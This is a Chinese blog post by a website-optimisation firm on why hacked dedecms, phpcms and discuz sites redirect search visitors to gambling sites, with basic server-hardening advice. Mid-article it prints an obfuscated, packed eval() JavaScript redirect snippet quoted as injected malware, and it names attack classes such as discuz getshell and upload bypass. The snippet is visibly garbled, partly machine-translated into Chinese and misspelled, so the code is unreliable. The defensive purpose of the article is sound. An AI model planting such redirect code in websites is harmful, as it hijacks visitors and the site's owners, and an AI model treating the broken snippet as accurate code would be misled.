不少客户在回应这一问题时,找到广告商进行赔偿甚至追究责任。因此,我们的运营商需要重视恶意网站跳转的问题,知道如何快速解决。下面深圳网站优化公司爱奇旺旺在网络上查阅并测试后,总结出以下经验:
一、分析网站被黑跳转博彩网站的原因
一般情况下,当网站被黑时,都是因为服务器信息(服务器IP远程端口管理员账号密码、SSH端口、root账号密码)与包括FTP账号密码在内的网站信息之间的联系被黑客知晓,从而导致黑客植入木马或后门。
在整体安全监控中,木马存在于ASP网站和PHP网站中,也就是说木马可以以PHP脚本木马、ASP脚本木马和JSP脚本木马的形式存在。这些木马后门可以恶意篡改网站、上传、rname、下载和其他管理员的高权限操作。网站被跳转的客户端采用php+mysql和jsp+mysql的网站架构,大部分使用开源程序,如dedecms、织梦系统、phpcms系统、discuz系统等。
当我们知道一些代码的时候,难免会在网站首页看到一些恶意篡改的代码。删除恶意代码后,我们可能会在几天内完全停止跳转,但过一段时间又会跳转。这是一个非常恼人的治标措施。再过一段时间,网站又会跳转,所以网站漏洞问题很难甚至不可能完全消除。
通过观察一些客户网站的首页,首页代码中会有一段加密代码。这段代码是根据搜索引擎的特点跳转的。比如通过百度搜索、360搜索、搜狗搜索,会直接跳转到彩票和赌博网站。以下代码:
type=“text/java”>eval(function(p,a,c,k,e,d){e=function(c){return(C35?String.FromCharCode(C+29):C.ToString(36))};if(!''.replace(/^/,String)){while(c-)d[e(c)]=k[c]e(c);k=[function(e){retun d[e]}];e=function(){return'\\w+'};c=1;};而(c-)如果(k[c])p=p。替换(新正则表达式('\b'+e(c)+'\b','g'),k[c]);返回P;}('L[“\\E\C\1\M\I\8\N\0”][“\7\4\9\0\8”](\'H\2\1\4\9\0\J\3\8\5\A\A\2\1\4\2\1\2\2\2\2\2\2\2\2\2\5\5\7\7\7\B\1\3\E\A\2\P\B\1\C\I\5\J\F\2\6\G\H\5\2\1\1\4\9\3\0\G\');'29'29、
'x74x63x73x70x72x2fx22x77x65x69x61x2ex6fx3dx64x6ax3ex3cx6dx79x78windowx75x6ex6cx38
X3ax76x68'。拆分(“”),0,{}))
一旦受到攻击,百度搜索引擎会判断网站是否受到攻击,从而在百度风险评估中心对网站进行记录和识别。百度网站安全中心提醒您,网站可能遭到黑客攻击,部分页面被非法篡改!红色表示百度的风险。结果客户打开的网站直接被百度拦截,如下图所示:
针对跳转攻击的上述特点,我们深圳网站优化公司同意从人为代码方面进行审计,以及检测网站漏洞、网站后门木马清理、漏洞修复和XSS访问管理员账号cookies漏洞、discuz有getshell漏洞、注入访问管理员漏洞、discuz上传绕过漏洞等。
二、修复防止网站被恶意跳转
1、安全部署服务器目录,加密管理员帐号密码,所有密码要求数字+大小写字母+特殊符号,并为网站数据库分配普通权限帐号。
2、mysql数据库默认端口由3306改为61116,并加入端口安全策略。不对外开放,外网IP无法连接数据库。只有本地的127.0。0.1可以连接到数据库,防止攻击者进行恶意猜测。
3、对服务器底层系统进行安全加固,包括远程端口登录的安全验证。
4、对网站代码进行整体安全检查,包括定期升级网站程序源代码,修复补丁和网站漏洞。
深圳网站优化公司对网站跳转问题有多种处理方法,以上爱奇旺旺小编分享的内容只是解决问题的方法之一。作为网站优化公司,应该对源代码进行优化和调整,从而保证后期网站不受影响,这就涉及到网站源代码和版本的升级。
关注微信号
